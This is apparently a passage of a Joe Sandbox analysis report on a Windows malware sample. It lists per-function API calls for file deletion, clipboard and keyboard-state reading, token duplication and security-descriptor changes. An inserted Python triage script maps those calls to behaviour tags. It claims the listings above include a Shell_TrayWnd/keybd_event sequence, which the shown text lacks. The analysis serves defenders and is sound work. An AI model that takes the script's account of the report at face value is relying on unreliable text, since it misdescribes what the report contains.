                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: ee7955abd1688e7028be2f69c0d384d34c0924e88a02963c928986590bfc38d2
                                                                                        • Instruction ID: e0e9cbc95ddbd8a5e1c424299d5ec003be1bb2865e4e1d3412f89eff05acf1db
                                                                                        • Opcode Fuzzy Hash: ee7955abd1688e7028be2f69c0d384d34c0924e88a02963c928986590bfc38d2
                                                                                        • Instruction Fuzzy Hash: CE819B71D0120DAFDF11DFA5CC49AEE7BB8EF08314F044119F824A6161DB758E95EB62
                                                                                        APIs
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F25FA6,?), ref: 00F26ED8
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F25FA6,?), ref: 00F26EF1
                                                                                          • Part of subcall function 00F2725E: __wsplitpath.LIBCMT ref: 00F2727B
                                                                                          • Part of subcall function 00F2725E: __wsplitpath.LIBCMT ref: 00F2728E
                                                                                          • Part of subcall function 00F272CB: GetFileAttributesW.KERNEL32(?,00F26019), ref: 00F272CC
                                                                                        • _wcscat.LIBCMT ref: 00F26149
                                                                                        • _wcscat.LIBCMT ref: 00F26167
                                                                                        • __wsplitpath.LIBCMT ref: 00F2618E
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F261A4
                                                                                        • _wcscpy.LIBCMT ref: 00F26209
                                                                                        • _wcscat.LIBCMT ref: 00F2621C
                                                                                        • _wcscat.LIBCMT ref: 00F2622F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F2625D
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F2626E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F26289
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F26298
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F262AD
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F262BE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F262E1
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F262FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F2630B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                        • String ID: \*.*$p1#v`K$v
                                                                                        • API String ID: 1917200108-1732502266
                                                                                        • Opcode ID: 75e3daddc92755cd0bf75a4c84af2ab52c7c9d6dcbd24bdecd40cdcffc31e8dd
                                                                                        • Instruction ID: 37e865f3cc11f9d712f1673fcd94845ef69cd3fbcb991f24d4d4708690bdf477
                                                                                        • Opcode Fuzzy Hash: 75e3daddc92755cd0bf75a4c84af2ab52c7c9d6dcbd24bdecd40cdcffc31e8dd
                                                                                        • Instruction Fuzzy Hash: B3514072D0812CAACF21EB91DC44EEB77BCAF05310F0501EAE555E3141DE769749AFA4
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00F7DC00), ref: 00F36B36
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F36B44
                                                                                        • GetClipboardData.USER32(0000000D), ref: 00F36B4C
                                                                                        • CloseClipboard.USER32 ref: 00F36B58
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F36B74
                                                                                        • CloseClipboard.USER32 ref: 00F36B7E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F36B93
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00F36BA0
                                                                                        • GetClipboardData.USER32(00000001), ref: 00F36BA8
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F36BB5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F36BE9
                                                                                        • CloseClipboard.USER32 ref: 00F36CF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: 9af580d07c0159d43a875c5f83a92fc2974c1b9fabf4ef843f64758c7faa10bc
                                                                                        • Instruction ID: fd0d1ddd63bf6265d0c63cb6669a76f656889d57faa60e9c5cdf68988ab4730a
                                                                                        • Opcode Fuzzy Hash: 9af580d07c0159d43a875c5f83a92fc2974c1b9fabf4ef843f64758c7faa10bc
                                                                                        • Instruction Fuzzy Hash: 9851C371700209ABD300EF65DD56F6E77B8EF84B61F004429F656E61E1DFB0D805AB62
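The three function listings above (the Shell_TrayWnd/AttachThreadInput/keybd_event sequence, the DuplicateTokenEx/winsta0/default sequence, and the clipboard sequence) are the kind of API groupings an analyst reduces to behaviour tags by hand. The following triage script is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses the "APIs" lines in the format shown on this page and maps each function's API set to a behaviour tag. The listing excerpt embedded in it is copied from the blocks above; the tag names, the matching rules and the `ARG_NAMES` table are this example's own assumptions (the constant values it names, VK_MENU = 0x12, SW_RESTORE = 9, CF_UNICODETEXT = 13, CF_TEXT = 1, SecurityImpersonation = 2, TokenPrimary = 1, are standard Win32 values).

```python
"""Triage helper for Joe Sandbox "APIs" function listings (added example, not
part of the report or of the Joe Sandbox tooling). Behaviour tags, rules and
the constant table below are this example's own assumptions."""
import re
from dataclasses import dataclass

# "• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F53AEA"
# "• GetCurrentThreadId.KERNEL32 ref: 00F53B27" (no argument list)
# "  • Part of subcall function 00F1B134: AdjustTokenPrivileges.ADVAPI32(...), ref: ..."
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: str      # raw argument list as printed, "" when none
    ref: str       # call-site address from the listing
    subcall: bool  # True when the report attributes the call to a callee

# Hypothetical triage rules: every API in the set must appear directly in one function.
RULES = {
    "force-foreground-window": {"AttachThreadInput", "SetForegroundWindow", "keybd_event"},
    "run-as-other-user": {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "clipboard-read": {"OpenClipboard", "GetClipboardData", "GlobalLock"},
}

# (api, argument index) -> printed value -> Win32 constant name
ARG_NAMES = {
    ("keybd_event", 0): {"00000012": "VK_MENU"},
    ("MapVirtualKeyW", 0): {"00000012": "VK_MENU"},
    ("ShowWindow", 1): {"00000009": "SW_RESTORE"},
    ("IsClipboardFormatAvailable", 0): {"0000000D": "CF_UNICODETEXT", "00000001": "CF_TEXT"},
    ("GetClipboardData", 0): {"0000000D": "CF_UNICODETEXT", "00000001": "CF_TEXT"},
    ("DuplicateTokenEx", 3): {"00000002": "SecurityImpersonation"},
    ("DuplicateTokenEx", 4): {"00000001": "TokenPrimary"},
}

def parse_listing(text):
    """Group API lines into functions; each 'APIs' header opens a new one."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            current.append(ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"], bool(m["sub"])))
    return functions

def classify(calls):
    """Tags whose full API set is called directly by this function (subcalls excluded)."""
    direct = {c.api for c in calls if not c.subcall}
    return sorted(tag for tag, needed in RULES.items() if needed <= direct)

def decode(call):
    """Render the call with known constants named; unknown arguments are kept verbatim."""
    args = call.args.split(",") if call.args else []
    named = [ARG_NAMES.get((call.api, i), {}).get(a, a) for i, a in enumerate(args)]
    return f"{call.api}({', '.join(named)})"

def report(text):
    out = []
    for i, calls in enumerate(parse_listing(text)):
        out.append(f"function {i}: {', '.join(classify(calls)) or '(no rule matched)'}")
        out.extend("    " + decode(c) for c in calls if not c.subcall)
    return "\n".join(out)

# Excerpt copied from the report's listings above (trimmed to the relevant lines).
SAMPLE = """\
APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 00EFEB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F53AEA
• ShowWindow.USER32(000000FF,00000009), ref: 00F53B00
• GetCurrentThreadId.KERNEL32 ref: 00F53B27
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F53B44
• SetForegroundWindow.USER32(000000FF), ref: 00F53B57
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B6C
• keybd_event.USER32(00000012,00000000), ref: 00F53B77
APIs
  • Part of subcall function 00F1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
• _memset.LIBCMT ref: 00F1AD08
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F1AD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F1AD82
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F1ADBF
APIs
• OpenClipboard.USER32(00F7DC00), ref: 00F36B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00F36B44
• GetClipboardData.USER32(0000000D), ref: 00F36B4C
• GlobalLock.KERNEL32(00000000), ref: 00F36B74
• CloseClipboard.USER32 ref: 00F36CF6
"""

if __name__ == "__main__":
    print(report(SAMPLE))
```

Subcall lines are parsed but excluded from rule matching on purpose: the report attributes them to a callee, so counting them would tag every caller of a privilege-adjusting helper as if it did the work itself. Feeding the script a full exported listing instead of `SAMPLE` gives one tag line per function, which is a faster starting point than reading each "API ID" string.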
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F2F62B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F2F67F
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2F6A4
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2F6BB
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F2F6E2
                                                                                        • __swprintf.LIBCMT ref: 00F2F72E
                                                                                        • __swprintf.LIBCMT ref: 00F2F767
                                                                                        • __swprintf.LIBCMT ref: 00F2F7BB
                                                                                          • Part of subcall function 00F0172B: __woutput_l.LIBCMT ref: 00F01784
                                                                                        • __swprintf.LIBCMT ref: 00F2F809
                                                                                        • __swprintf.LIBCMT ref: 00F2F858
                                                                                        • __swprintf.LIBCMT ref: 00F2F8A7
                                                                                        • __swprintf.LIBCMT ref: 00F2F8F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 835046349-2428617273
                                                                                        • Opcode ID: ace4ffa17f53fc7ddd47cd8e85451896828c455893bd4cc22f2c10e61d082784
                                                                                        • Instruction ID: c5832943c2bb1ecafe2117d814d61358b36e0157443afce18a92fc93aca309ed
                                                                                        • Opcode Fuzzy Hash: ace4ffa17f53fc7ddd47cd8e85451896828c455893bd4cc22f2c10e61d082784
                                                                                        • Instruction Fuzzy Hash: 8AA11EB2508344ABC310EB95CC85DAFB7ECAF98700F40182EF69593192EB74D949D762
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F31B50
                                                                                        • _wcscmp.LIBCMT ref: 00F31B65
                                                                                        • _wcscmp.LIBCMT ref: 00F31B7C
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F31B8E
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00F31BA8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F31BC0
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31BCB
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F31BE7
                                                                                        • _wcscmp.LIBCMT ref: 00F31C0E
                                                                                        • _wcscmp.LIBCMT ref: 00F31C25
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F31C37
                                                                                        • SetCurrentDirectoryW.KERNEL32(00F939FC), ref: 00F31C55
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F31C5F
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31C6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31C7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: c8307dcb0e508b75b385f104d621038d2365ed4ebc0e6692a5a3661f7b7033ee
                                                                                        • Instruction ID: dab7d9e874eae0a20cc1e08976529a144c1aa92d3abebece0dcadbaf681f3c19
                                                                                        • Opcode Fuzzy Hash: c8307dcb0e508b75b385f104d621038d2365ed4ebc0e6692a5a3661f7b7033ee
                                                                                        • Instruction Fuzzy Hash: A031D332A002196FDF14AFA1DC49AEE77ACBF49370F144156E811E3090EBB4DE45AA64
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F31CAB
• _wcscmp.LIBCMT ref: 00F31CC0
• _wcscmp.LIBCMT ref: 00F31CD7
  • Part of subcall function 00F26BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F26BEF
• FindNextFileW.KERNEL32(00000000,?), ref: 00F31D06
• FindClose.KERNEL32(00000000), ref: 00F31D11
• FindFirstFileW.KERNEL32(*.*,?), ref: 00F31D2D
• _wcscmp.LIBCMT ref: 00F31D54
• _wcscmp.LIBCMT ref: 00F31D6B
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F31D7D
• SetCurrentDirectoryW.KERNEL32(00F939FC), ref: 00F31D9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F31DA5
• FindClose.KERNEL32(00000000), ref: 00F31DB2
• FindClose.KERNEL32(00000000), ref: 00F31DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
APIs
Strings
Similarity
• API ID: _memset
• String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
• API String ID: 2102423945-2023335898
APIs
• GetLocalTime.KERNEL32(?), ref: 00F309DF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00F309EF
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F309FB
• __wsplitpath.LIBCMT ref: 00F30A59
• _wcscat.LIBCMT ref: 00F30A71
• _wcscat.LIBCMT ref: 00F30A83
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F30A98
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F30AAC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F30ADE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F30AFF
• _wcscpy.LIBCMT ref: 00F30B0B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F30B4A
Strings
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
APIs
  • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
  • Part of subcall function 00F1ABBB: GetLastError.KERNEL32(?,00F1A69F,?,?,?), ref: 00F1ABE1
  • Part of subcall function 00F1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00F1A69F,?,?,?), ref: 00F1ABF0
  • Part of subcall function 00F1ABBB: HeapAlloc.KERNEL32(00000000,?,00F1A69F,?,?,?), ref: 00F1ABF7
  • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F1AC0E
  • Part of subcall function 00F1AC56: GetProcessHeap.KERNEL32(00000008,00F1A6B5,00000000,00000000,?,00F1A6B5,?), ref: 00F1AC62
  • Part of subcall function 00F1AC56: HeapAlloc.KERNEL32(00000000,?,00F1A6B5,?), ref: 00F1AC69
  • Part of subcall function 00F1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F1A6B5,?), ref: 00F1AC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F1A6D0
• _memset.LIBCMT ref: 00F1A6E5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F1A704
• GetLengthSid.ADVAPI32(?), ref: 00F1A715
• GetAce.ADVAPI32(?,00000000,?), ref: 00F1A752
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F1A76E
• GetLengthSid.ADVAPI32(?), ref: 00F1A78B
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F1A79A
• HeapAlloc.KERNEL32(00000000), ref: 00F1A7A1
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F1A7C2
• CopySid.ADVAPI32(00000000), ref: 00F1A7C9
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F1A7FA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F1A820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F1A834
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
APIs
  • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F25FA6,?), ref: 00F26ED8
  • Part of subcall function 00F272CB: GetFileAttributesW.KERNEL32(?,00F26019), ref: 00F272CC
• _wcscat.LIBCMT ref: 00F26441
• __wsplitpath.LIBCMT ref: 00F2645F
• FindFirstFileW.KERNEL32(?,?), ref: 00F26474
• _wcscpy.LIBCMT ref: 00F264A3
• _wcscat.LIBCMT ref: 00F264B8
• _wcscat.LIBCMT ref: 00F264CA
• DeleteFileW.KERNEL32(?), ref: 00F264DA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F264EB
• FindClose.KERNEL32(00000000), ref: 00F26506
Strings
Similarity
• API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
• String ID: \*.*$p1#v`K$v
• API String ID: 2643075503-1732502266
Strings
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-4052911093
APIs
  • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F4328E
  • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
  • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F4332D
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F433C5
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F43604
• RegCloseKey.ADVAPI32(00000000), ref: 00F43611
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
APIs
• GetKeyboardState.USER32(?), ref: 00F22B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00F22BE0
• GetKeyState.USER32(000000A0), ref: 00F22BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00F22C15
• GetKeyState.USER32(000000A1), ref: 00F22C2A
• GetAsyncKeyState.USER32(00000011), ref: 00F22C42
• GetKeyState.USER32(00000011), ref: 00F22C54
• GetAsyncKeyState.USER32(00000012), ref: 00F22C6C
• GetKeyState.USER32(00000012), ref: 00F22C7E
• GetAsyncKeyState.USER32(0000005B), ref: 00F22C96
• GetKeyState.USER32(0000005B), ref: 00F22CA8
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 6ed6e767034c4ca227f9fc4f3fa6f3deecd4eebf251153074144433ac09e904e
                                                                                        • Instruction ID: d1d9bef58660e724eddc18b16e377ad6748d6b7ebd0d138080d8a30487e14cdb
                                                                                        • Opcode Fuzzy Hash: 6ed6e767034c4ca227f9fc4f3fa6f3deecd4eebf251153074144433ac09e904e
                                                                                        • Instruction Fuzzy Hash: 4D411630E447E93DFFB19B60A8143BDBEA06B11334F084049D9C2566C1DBA49DC4E7A2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: c54b135503bd007de63da8dd5f462b23c8dfd1880f94fa2c2c09975d8317bc87
                                                                                        • Instruction ID: b66aa1aa2d0a6de853c2771906c0060b36b32bbd142d81140e806e0dca14ee0c
                                                                                        • Opcode Fuzzy Hash: c54b135503bd007de63da8dd5f462b23c8dfd1880f94fa2c2c09975d8317bc87
                                                                                        • Instruction Fuzzy Hash: F9219F31700118AFDB11AF65DC49B2EB7A8FF44720F05C019FA1ADB2A1CB75E900ABA0
                                                                                        APIs
                                                                                          • Part of subcall function 00F19ABF: CLSIDFromProgID.OLE32 ref: 00F19ADC
                                                                                          • Part of subcall function 00F19ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00F19AF7
                                                                                          • Part of subcall function 00F19ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00F19B05
                                                                                          • Part of subcall function 00F19ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00F19B15
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F3C235
                                                                                        • _memset.LIBCMT ref: 00F3C242
                                                                                        • _memset.LIBCMT ref: 00F3C360
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00F3C38C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00F3C397
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 00F3C3E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: 0146b7f0c04ce3712e111a2872fa2e4271c7eddbece629289db8e54ccfd0173d
                                                                                        • Instruction ID: 0880857a09cab87bf3ff97494b1968ee31c9d449353a5b1a8d5d954f456b5410
                                                                                        • Opcode Fuzzy Hash: 0146b7f0c04ce3712e111a2872fa2e4271c7eddbece629289db8e54ccfd0173d
                                                                                        • Instruction Fuzzy Hash: C5913C71D00218ABDB10DFA5DC55EDEBBB8EF04720F10815AF519B7291DB709A45DFA0
                                                                                        APIs
